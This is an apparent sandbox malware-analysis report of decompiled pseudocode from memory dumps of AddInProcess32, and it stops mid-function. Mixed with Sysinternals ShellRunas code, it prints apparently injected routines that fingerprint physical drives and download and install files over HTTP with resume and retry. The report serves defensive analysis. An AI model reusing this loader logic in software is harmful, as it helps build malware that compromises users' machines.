                                              								_t109 =  &_v924;
                                              								_push(_t109);
                                              								_push(_t166);
                                              								_push( &_v220);
                                              								_push( &_v300);
                                              								L0040316C();
                                              								__eflags = _t109 - 3;
                                              								if(_t109 != 3) {
                                              									_t163 = 0x80004023;
                                              								}
                                              								goto L27;
                                              							}
                                              							if(__eflags > 0) {
                                              								_t103 = _t103 & 0x0000ffff | 0x80070000;
                                              							}
                                              							goto L26;
                                              						}
                                              						__eflags = _v884 & 0x00001000;
                                              						if((_v884 & 0x00001000) == 0) {
                                              							goto L18;
                                              						}
                                              						_t117 = 1;
                                              						goto L19;
                                              					} else {
                                              						_t163 = 0;
                                              						goto L28;
                                              					}
                                              				} else {
                                              					_t111 = GetLastError();
                                              					if(_t111 > 0) {
                                              						_t163 = _t111 & 0x0000ffff | 0x80070000;
                                              					} else {
                                              						_t163 = _t111;
                                              					}
                                              					goto L28;
                                              				}
                                              			}

                                              Instruction address column for the listing above (flattened by extraction; original range 0x004029c0 to 0x00402ca7)

                                              APIs
                                              • _memset.LIBCMT ref: 00402A1E
                                              • _memset.LIBCMT ref: 00402A36
                                              • SHGetMalloc.SHELL32(?), ref: 00402A43
                                              • SHGetDesktopFolder.SHELL32(?,?,?,?), ref: 00402A58
                                              • SearchPathW.KERNEL32(00000000,?,.exe,?,?,?,?,?,?), ref: 00402A7A
                                              • GetLastError.KERNEL32(?,.exe,?,?,?,?,?,?), ref: 00402A84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: _memset$DesktopErrorFolderLastMallocPathSearch
                                              • String ID: .exe
                                              • API String ID: 1184172398-4119554291
                                              • Opcode ID: fb7a9b76fc0a125024f92bf21f90df84a81b0ed7226d44e92ef0621ef33c86bd
                                              • Instruction ID: 348cd96654d2abbfe703da2164321630b7e188129bd778ae1d25fea451b48038
                                              • Opcode Fuzzy Hash: fb7a9b76fc0a125024f92bf21f90df84a81b0ed7226d44e92ef0621ef33c86bd
                                              • Instruction Fuzzy Hash: E981AD71508200AFD320EF58C988D6FB7E9AFC8704F144A6DF549E7290D6B8ED45CBA6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E02B5355B(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				char _v108;
                                              				short _v620;
                                              				intOrPtr _v2904;
                                              				intOrPtr _v2908;
                                              				void _v2920;
                                              				signed int _v2928;
                                              				void _v2932;
                                              				signed int _v2936;
                                              				signed int _v2940;
                                              				intOrPtr _v2944;
                                              				intOrPtr _v2952;
                                              				void _v2956;
                                              				long _v2960;
                                              				long _v2964;
                                              				signed int _t46;
                                              				void* _t56;
                                              				intOrPtr _t70;
                                              				intOrPtr _t71;
                                              				signed int _t83;
                                              				char* _t85;
                                              				signed int _t96;
                                              				void* _t99;
                                              				void* _t101;
                                              				signed int _t102;
                                              				long* _t103;
                                              
                                              				_t46 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t46 ^ _t102;
                                              				_t85 = __ecx;
                                              				_t101 = 0;
                                              				 *((char*)(__ecx)) = 0;
                                              				do {
                                              					wsprintfW( &_v620, L"\\\\.\\PhysicalDrive%d", _t101);
                                              					_t103 =  &(_t103[3]);
                                              					_t99 = CreateFileW( &_v620, 0, 3, 0, 3, 0, 0);
                                              					if(_t99 != 0xffffffff) {
                                              						_v2964 = _v2964 & 0x00000000;
                                              						_t56 = E02B52CE7(_t52,  &_v2932, 0xc);
                                              						_v2932 = _v2932 & 0x00000000;
                                              						_v2928 = _v2928 & 0x00000000;
                                              						 *_t103 = 0x8fc;
                                              						E02B52CE7(_t56,  &_v2920);
                                              						if(DeviceIoControl(_t99, 0x2d1400,  &_v2932, 0xc,  &_v2920, 0x8fc,  &_v2964, 0) != 0) {
                                              							_v2960 = 0;
                                              							if(DeviceIoControl(_t99, 0x70000, 0, 0,  &_v2956, 0x18,  &_v2960, 0) == 0) {
                                              								_v2960 = _v2960 & 0x00000000;
                                              							} else {
                                              								_t96 = _v2936 * _v2940 >> 0x20;
                                              								_t83 = E02B53E50(E02B53E50(_v2936 * _v2940, _t96, _v2944, 0), _t96, _v2956, _v2952);
                                              								_t65 = (_t96 << 0x00000020 | _t83) >> 0x1e;
                                              								_v2960 = (_t96 << 0x00000020 | _t83) >> 0x1e;
                                              							}
                                              							E02B52CE7(_t65,  &_v108, 0x64);
                                              							 *_t103 = "---";
                                              							lstrcpyA( &_v108, ??);
                                              							 *0x2b59470 =  *0x2b59470 + _v2960;
                                              							_t70 = _v2908;
                                              							if(_t70 != 0) {
                                              								lstrcatA( &_v108, _t70 +  &_v2920);
                                              							}
                                              							_t71 = _v2904;
                                              							if(_t71 != 0) {
                                              								lstrcatA( &_v108, _t71 +  &_v2920);
                                              							}
                                              							StrNCatA(_t85,  &_v108, 0x28a);
                                              						}
                                              						CloseHandle(_t99);
                                              					}
                                              					_t101 = _t101 + 1;
                                              				} while (_t101 < 0x64);
                                              				StrNCatA(_t85, "---", 0x28a);
                                              				return E02B53C33(_v8 ^ _t102);
                                              			}

                                              Instruction address column for the listing above (flattened by extraction; original range 0x02b53564 to 0x02b5372b)

                                              APIs
                                              • wsprintfW.USER32 ref: 02B53585
                                              • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 02B5359F
                                              • DeviceIoControl.KERNEL32 ref: 02B53609
                                              • DeviceIoControl.KERNEL32 ref: 02B53638
                                              • lstrcpyA.KERNEL32(?,00000064), ref: 02B5369B
                                              • lstrcatA.KERNEL32(?,?), ref: 02B536C4
                                              • lstrcatA.KERNEL32(?,?), ref: 02B536E1
                                              • StrNCatA.SHLWAPI(?,?,0000028A), ref: 02B536F1
                                              • CloseHandle.KERNEL32(00000000), ref: 02B536F8
                                              • StrNCatA.SHLWAPI(?,---,0000028A), ref: 02B53713
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ControlDevicelstrcat$CloseCreateFileHandlelstrcpywsprintf
                                              • String ID: ---$\\.\PhysicalDrive%d
                                              • API String ID: 2918303280-2389916857
                                              • Opcode ID: 20e46dda7bb7f739cbf91084d7b6b2556cc6e07162c68bbdb861941e2ae98bdf
                                              • Instruction ID: 8706a26ed80b4c8c20ffd7dddc755a4eb3619ae0ccefe95d38d45717109d869f
                                              • Opcode Fuzzy Hash: 20e46dda7bb7f739cbf91084d7b6b2556cc6e07162c68bbdb861941e2ae98bdf
                                              • Instruction Fuzzy Hash: 04516072A40328AFEB119FA0DC49FAA77BCEF04754F0445D9B909EB180DB759A94CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00407219() {
                                              
                                              				SetUnhandledExceptionFilter(E004071DC);
                                              				return 0;
                                              			}

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_000071DC), ref: 0040721E
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 60dce524007cd36b1afbdad1174eb971ab13da7a47c5473fb774a753f846e0e8
                                              • Instruction ID: 4a2c546b5ce0fac6330c053a0bce39fcca3f6a47db525e6d2e0361f563a01c8d
                                              • Opcode Fuzzy Hash: 60dce524007cd36b1afbdad1174eb971ab13da7a47c5473fb774a753f846e0e8
                                              • Instruction Fuzzy Hash: 489002B0A651044EC6001FB05D0950535905A896127514871A401FC1D4EE7454449D6A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_1380000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de94b6e7ba717fe7bfd838e2ebb51f2c74a3f24c5ea4661c3e3b03928f95739b
                                              • Instruction ID: e2ec0dc0d522a164dab598bcb263af9aa4d0bb8724df374b3716a027fb0f69c6
                                              • Opcode Fuzzy Hash: de94b6e7ba717fe7bfd838e2ebb51f2c74a3f24c5ea4661c3e3b03928f95739b
                                              • Instruction Fuzzy Hash: 49F0923703D2927BDAC8EA35D0955A37FF4FB5AB043613839C002EB006E626F4579241
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 69%
                                              			E00401D50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				signed int _v8;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				short _v552;
                                              				struct tagLOGFONTW _v644;
                                              				int _v652;
                                              				void* __ebx;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t21;
                                              				int _t23;
                                              				void* _t24;
                                              				struct HWND__* _t27;
                                              				int _t28;
                                              				long _t30;
                                              				void* _t41;
                                              				struct HBRUSH__* _t43;
                                              				void* _t45;
                                              				void* _t47;
                                              				void* _t48;
                                              				int _t71;
                                              				void* _t72;
                                              				void* _t73;
                                              				int _t74;
                                              				void* _t76;
                                              				struct HWND__* _t78;
                                              				struct HWND__* _t97;
                                              				long _t102;
                                              				void* _t103;
                                              				void* _t105;
                                              				void* _t108;
                                              				signed int _t109;
                                              				void* _t115;
                                              
                                              				_t111 = (_t109 & 0xfffffff8) - 0x274;
                                              				_t21 =  *0x413004; // 0x98fc836b
                                              				_v8 = _t21 ^ (_t109 & 0xfffffff8) - 0x00000274;
                                              				_t23 = _a8;
                                              				_t115 = _t23 - 0x138;
                                              				_t71 = _a12;
                                              				_t102 = _a16;
                                              				_t97 = _a4;
                                              				if(_t115 > 0) {
                                              					_t24 = _t23 - 0x200;
                                              					if(_t24 == 0) {
                                              						_push(_t102 >> 0x10);
                                              						_t27 = ChildWindowFromPoint(_t97, _t102 & 0x0000ffff);
                                              						_t78 =  *0x414aa4;
                                              						_t28 =  *0x414aa8;
                                              						if(_t28 == (0 | _t27 == _t78)) {
                                              							 *0x414aa8 = 0 | _t28 == 0x00000000;
                                              							InvalidateRect(_t78, 0, 0);
                                              							_t28 =  *0x414aa8;
                                              						}
                                              						if(_t28 == 0) {
                                              							SetCursor( *0x414a9c);
                                              						} else {
                                              							SetCursor( *0x414aa0);
                                              						}
                                              					} else {
                                              						if(_t24 == 2) {
                                              							_push(_t102 >> 0x10);
                                              							if(ChildWindowFromPoint(_t97, _t102 & 0x0000ffff) ==  *0x414aa4) {
                                              								ShellExecuteW(_t97, L"open", L"http://www.sysinternals.com", 0, 0, 1);
                                              							}
                                              						}
                                              					}
                                              					goto L25;
                                              				} else {
                                              					if(_t115 == 0) {
                                              						if(_t102 !=  *0x414aa4) {
                                              							goto L25;
                                              						} else {
                                              							SetBkMode(_t71, 1);
                                              							if(GetSysColorBrush(0x1a) == 0) {
                                              								_push(0xff0000);
                                              							} else {
                                              								_push(GetSysColor(0x1a));
                                              							}
                                              							SetTextColor(_t71, ??);
                                              							_t41 =  *0x414a98;
                                              							if( *0x414aa8 == 0) {
                                              								_t41 =  *0x414a94;
                                              							}
                                              							SelectObject(_t71, _t41);
                                              							_t43 = GetSysColorBrush(0xf);
                                              							_pop(_t105);
                                              							_pop(_t73);
                                              							E0040318A(_t43, _t73, _v32 ^ _t111, _t105);
                                              							return _t43;
                                              						}
                                              					} else {
                                              						_t45 = _t23 - 0x10;
                                              						if(_t45 == 0) {
                                              							L6:
                                              							EndDialog(_t97, 0);
                                              							PostQuitMessage(0);
                                              							goto L25;
                                              						} else {
                                              							_t47 = _t45 - 0x100;
                                              							if(_t47 == 0) {
                                              								_t48 = GetStockObject(0x11);
                                              								 *0x414a94 = _t48;
                                              								GetObjectW(_t48, 0x5c,  &(_v644.lfOrientation));
                                              								_v644.lfUnderline = 1;
                                              								 *0x414a98 = CreateFontIndirectW( &_v644);
                                              								 *0x414aa8 = 1;
                                              								 *0x414aa4 = GetDlgItem(_t97, 0x40a);
                                              								GetModuleFileNameW(0,  &_v552, 0x208);
                                              								_t74 = GetFileVersionInfoSizeW( &_v552,  &_v652);
                                              								GetFileVersionInfoW( &_v552, 0, _t74, E0040354A(_t74));
                                              								SetDlgItemTextW(_t97, 0x46c, E00401D00(_t55, L"FileVersion"));
                                              								SetDlgItemTextW(_t97, 0x46b, E00401D00(_t55, L"LegalCopyright"));
                                              								 *0x414a9c = LoadCursorW(GetModuleHandleW(0), L"HAND");
                                              								 *0x414aa0 = LoadCursorW(0, 0x7f00);
                                              								ShowWindow(_t97, 5);
                                              								_pop(_t108);
                                              								_pop(_t76);
                                              								E0040318A(1, _t76, _v28 ^ _t111 + 0xc, _t108);
                                              								return 1;
                                              							} else {
                                              								if(_t47 == 1 && (_t71 & 0x0000ffff) + 0xffffffff <= 1) {
                                              									goto L6;
                                              								}
                                              								L25:
                                              								_t30 = DefWindowProcW(_t97, _a8, _t71, _t102);
                                              								_pop(_t103);
                                              								_pop(_t72);
                                              								E0040318A(_t30, _t72, _v8 ^ _t111, _t103);
                                              								return _t30;
                                              							}
                                              						}
                                              					}
                                              				}
                                              			}

                                              APIs
                                              • EndDialog.USER32(?,00000000), ref: 00401DB1
                                              • PostQuitMessage.USER32(00000000), ref: 00401DB9
                                              • GetStockObject.GDI32(00000011), ref: 00401DC6
                                              • GetObjectW.GDI32(00000000,0000005C,?), ref: 00401DD9
                                              • CreateFontIndirectW.GDI32 ref: 00401DE9
                                              • GetDlgItem.USER32 ref: 00401E04
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?), ref: 00401E1B
                                              • GetFileVersionInfoSizeW.VERSION(?,?,?,?,?,?,?,?,?,?), ref: 00401E2B
                                              • _malloc.LIBCMT ref: 00401E33
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00401E46
                                              • SetDlgItemTextW.USER32 ref: 00401E65
                                              • SetDlgItemTextW.USER32 ref: 00401E7B
                                              • GetModuleHandleW.KERNEL32(00000000,HAND), ref: 00401E84
                                              • LoadCursorW.USER32(00000000), ref: 00401E91
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00401E9F
                                              • ShowWindow.USER32(?,00000005), ref: 00401EA9
                                              • SetBkMode.GDI32(?,00000001), ref: 00401EDA
                                              • GetSysColorBrush.USER32(0000001A), ref: 00401EE8
                                              • GetSysColor.USER32(0000001A), ref: 00401EF0
                                              • SetTextColor.GDI32(?,00FF0000), ref: 00401EFF
                                              • SelectObject.GDI32(?,?), ref: 00401F1A
                                              • GetSysColorBrush.USER32(0000000F), ref: 00401F22
                                              • ChildWindowFromPoint.USER32 ref: 00401F56
                                              • ShellExecuteW.SHELL32(?,open,http://www.sysinternals.com,00000000,00000000,00000001), ref: 00401F75
                                              • ChildWindowFromPoint.USER32 ref: 00401F88
                                              • InvalidateRect.USER32(?,00000000,00000000,?,?), ref: 00401FB6
                                              • SetCursor.USER32(?,?,?), ref: 00401FD4
                                              • DefWindowProcW.USER32(?,?,?,?,?,?), ref: 00401FE1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ColorWindow$CursorFileItemObjectText$BrushChildFromInfoLoadModulePointVersion$CreateDialogExecuteFontHandleIndirectInvalidateMessageModeNamePostProcQuitRectSelectShellShowSizeStock_malloc
                                              • String ID: FileVersion$HAND$LegalCopyright$http://www.sysinternals.com$open
                                              • API String ID: 3345172160-4191033705
                                              • Opcode ID: 2f602c52077be3eec7b50e33d563c06f28bb8856962e059969dcbe1c2fda3ebc
                                              • Instruction ID: e26033b52e4dbe09ff1a83e59bdc46354e0d09b5a075afc51df58c3e83d68215
                                              • Opcode Fuzzy Hash: 2f602c52077be3eec7b50e33d563c06f28bb8856962e059969dcbe1c2fda3ebc
                                              • Instruction Fuzzy Hash: FC61D771640201AFE7109FA5ED89FBB37A8EF88741F11853AF509F61E1CB7898058B6D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 100%
                                              			E00401930(char _a4) {
                                              
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user...\\Command");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user...");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user (netonly)...\\Command");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user (netonly)...");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user...\\Command");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user...");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user (netonly)...\\Command");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user (netonly)...");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user...\\Command");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user...");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user (netonly)...\\Command");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user (netonly)...");
                                              				if(_a4 != 0) {
                                              					MessageBoxW(0, L"ShellRunas context menu handler unregistered.", L"ShellRunas - Sysinternals: www.sysinternals.com", 0x40);
                                              				}
                                              				return 0;
                                              			}

                                              APIs
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command), ref: 00401941
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...), ref: 0040194D
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command), ref: 00401959
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...), ref: 00401965
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user...\Command), ref: 00401971
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user...), ref: 0040197D
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command), ref: 00401989
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user (netonly)...), ref: 00401995
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command), ref: 004019A1
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...), ref: 004019AD
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command), ref: 004019B9
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...), ref: 004019C5
                                              • MessageBoxW.USER32(00000000,ShellRunas context menu handler unregistered.,ShellRunas - Sysinternals: www.sysinternals.com,00000040), ref: 004019DD
                                              Strings
                                              • Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)..., xrefs: 004019BB
                                              • Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command, xrefs: 0040197F
                                              • Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)..., xrefs: 0040195B
                                              • Software\Classes\lnkfile\Shell\Run as different user..., xrefs: 00401973
                                              • Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command, xrefs: 004019AF
                                              • Software\Classes\lnkfile\Shell\Run as different user (netonly)..., xrefs: 0040198B
                                              • Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command, xrefs: 00401997
                                              • ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 004019D1
                                              • Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command, xrefs: 0040194F
                                              • Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user..., xrefs: 00401943
                                              • Software\Classes\lnkfile\Shell\Run as different user...\Command, xrefs: 00401967
                                              • Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user..., xrefs: 004019A3
                                              • ShellRunas context menu handler unregistered., xrefs: 004019D6
                                              • Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command, xrefs: 00401937
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Delete$Message
                                              • String ID: ShellRunas - Sysinternals: www.sysinternals.com$ShellRunas context menu handler unregistered.$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command$Software\Classes\lnkfile\Shell\Run as different user (netonly)...$Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command$Software\Classes\lnkfile\Shell\Run as different user...$Software\Classes\lnkfile\Shell\Run as different user...\Command
                                              • API String ID: 3870238891-4209861522
                                              • Opcode ID: 740cf35f253191141593886196fbd27c721ca799f3015d695be5faa3ca5f58ce
                                              • Instruction ID: 5da64dfe4fce38312f7ee7f6f0bbc387e0a5c92d836bb648faa7c577a003e90f
                                              • Opcode Fuzzy Hash: 740cf35f253191141593886196fbd27c721ca799f3015d695be5faa3ca5f58ce
                                              • Instruction Fuzzy Hash: EFF03F70AD5328B9E26023E25D0BFDA7D40CB24BA6F30011B7B4C3509249EA21E5C9EE
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E02B51564(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi, void* __esi, WCHAR* _a4, long _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, WCHAR* _a24, long _a28) {
                                              				signed int _v12;
                                              				short _v144;
                                              				short _v400;
                                              				short _v920;
                                              				WCHAR* _v924;
                                              				long _v928;
                                              				long _v932;
                                              				struct _SECURITY_ATTRIBUTES* _v936;
                                              				struct _OVERLAPPED* _v940;
                                              				void* _v944;
                                              				struct _SECURITY_ATTRIBUTES* _v948;
                                              				void _v952;
                                              				long _v956;
                                              				WCHAR* _v960;
                                              				intOrPtr _v964;
                                              				long _v968;
                                              				intOrPtr _v972;
                                              				signed int _v976;
                                              				WCHAR* _v980;
                                              				void* _v984;
                                              				signed int _t89;
                                              				long _t93;
                                              				int _t111;
                                              				long _t112;
                                              				void* _t114;
                                              				void* _t115;
                                              				int _t128;
                                              				void* _t131;
                                              				void* _t146;
                                              				long _t147;
                                              				intOrPtr _t162;
                                              				struct _OVERLAPPED* _t167;
                                              				intOrPtr _t170;
                                              				signed int _t175;
                                              				void* _t181;
                                              				long _t185;
                                              				void* _t188;
                                              				WCHAR* _t191;
                                              				signed int _t192;
                                              				void* _t193;
                                              
                                              				_t89 =  *0x2b56004; // 0xbb40e64e
                                              				_v12 = _t89 ^ _t192;
                                              				_v980 = __edx;
                                              				_v984 = __ecx;
                                              				_v964 = _a20;
                                              				_v924 = _a24;
                                              				_v956 = _a28;
                                              				_t175 = _a16;
                                              				_v960 = _a4;
                                              				_t93 = _a8;
                                              				_v928 = _t93;
                                              				_v972 = _a12 - _t93 + 1;
                                              				_v948 = 0;
                                              				_v920 = 0;
                                              				_v400 = 0;
                                              				_v936 = 0;
                                              				asm("sbb ecx, ecx");
                                              				_v976 = _t175;
                                              				_v940 =  ~_t175 & _t93 + _t175;
                                              				_t181 = 0xffffffff;
                                              				_t146 = HttpOpenRequestW(__ecx, L"GET", __edx, L"HTTP/1.1", 0x2b542bc, 0, _v956, 0);
                                              				_v944 = _t146;
                                              				_v952 = 0x2bf20; // 180000 ms = 3 minutes
                                              				InternetSetOptionW(_t146, 5,  &_v952, 4); // 5 = INTERNET_OPTION_SEND_TIMEOUT
                                              				InternetSetOptionW(_t146, 6,  &_v952, 4); // 6 = INTERNET_OPTION_RECEIVE_TIMEOUT
                                              				_t147 = 0;
                                              				_v968 = 0;
                                              				_v932 = 0;
                                              				if(_v940 != 0) {
                                              					_push(_a12);
                                              					_t185 = _v928;
                                              					_t147 = _t185;
                                              					_push(_t185);
                                              					L11:
                                              					wsprintfW( &_v144, L"RANGE:bytes=%d-%d\r\n\r\n"); // non-standard spelling (upper-case, no space after the colon); start = bytes already written, end = _a12
                                              					_t193 = _t193 + 0x10;
                                              					L12:
                                              					_t186 = _v944;
                                              					if(HttpAddRequestHeadersW(_v944,  &_v144, 0xffffffff, 0xa0000000) != 0) { // 0xa0000000 = HTTP_ADDREQ_FLAG_ADD | HTTP_ADDREQ_FLAG_REPLACE
                                              						if(E02B514D8(_t186) != 0) {
                                              							_t188 = HeapAlloc(GetProcessHeap(), 8, 0x200000); // HEAP_ZERO_MEMORY, 2 MiB read buffer
                                              							_v936 = _t188;
                                              							if(_t188 != 0) {
                                              								while(1) {
                                              									E02B52CE7(_t108, _t188, 0x200000);
                                              									_t111 = InternetReadFile(_v944, _t188, 0x200000,  &_v932);
                                              									_t189 = _t111;
                                              									if(_t111 == 0) {
                                              										break;
                                              									}
                                              									_t112 = _v932;
                                              									_t189 = 0;
                                              									if(_t112 == 0) {
                                              										if(_t147 != _v972) {
                                              											_t162 = _a20;
                                              											_t148 = _v924;
                                              											_a20 = _t162 + 1;
                                              											if(_t162 <= 0x1e) { // short read: schedule a retry while the attempt counter _a20 is <= 30
                                              												_v948 = 1;
                                              											}
                                              											L28:
                                              											if(_t181 != 0xffffffff) {
                                              												FlushFileBuffers(_t181);
                                              												CloseHandle(_t181);
                                              											}
                                              											_t114 = _v936;
                                              											if(_t114 != 0) {
                                              												HeapFree(GetProcessHeap(), 0, _t114);
                                              											}
                                              											L32:
                                              											_t115 = _v944;
                                              											if(_t115 != 0) {
                                              												InternetCloseHandle(_t115);
                                              											}
                                              											if(_v948 != 0) {
                                              												_t189 = E02B51564(_t148, _v984, _v980, _t181, _t189, _v960, _v928, _a12, _v976, _a20, _t148, _v956); // recursive self-call = retry, resuming from the current file size
                                              											}
                                              											return E02B53C33(_v12 ^ _t192);
                                              										}
                                              										_t189 = 1;
                                              										if(_v940 != 0) {
                                              											L27:
                                              											_t148 = _v924;
                                              											goto L28;
                                              										}
                                              										FlushFileBuffers(_t181);
                                              										CloseHandle(_t181);
                                              										_t148 = _v924;
                                              										_t181 = _t181 | 0xffffffff;
                                              										MoveFileExW(_v924, _v960, 1); // 1 = MOVEFILE_REPLACE_EXISTING: temp file becomes the final path _v960
                                              										goto L28;
                                              									}
                                              									_v928 = _v928 + _t112;
                                              									_t167 = _v940;
                                              									if(_t167 != 0) {
                                              										E02B52CC6(_t167, _v936, _t112);
                                              										_t108 = _v932;
                                              										_t193 = _t193 + 4;
                                              										_v940 = _t167 + _t108;
                                              										L23:
                                              										_t188 = _v936;
                                              										_t147 = _t147 + _t108;
                                              										continue;
                                              									}
                                              									_t128 = WriteFile(_t181, _v936, _t112,  &_v968, _t167);
                                              									_t189 = _t128;
                                              									if(_t128 == 0) {
                                              										goto L27;
                                              									}
                                              									FlushFileBuffers(_t181);
                                              									_t108 = _v932;
                                              									goto L23;
                                              								}
                                              								_t170 = _a20;
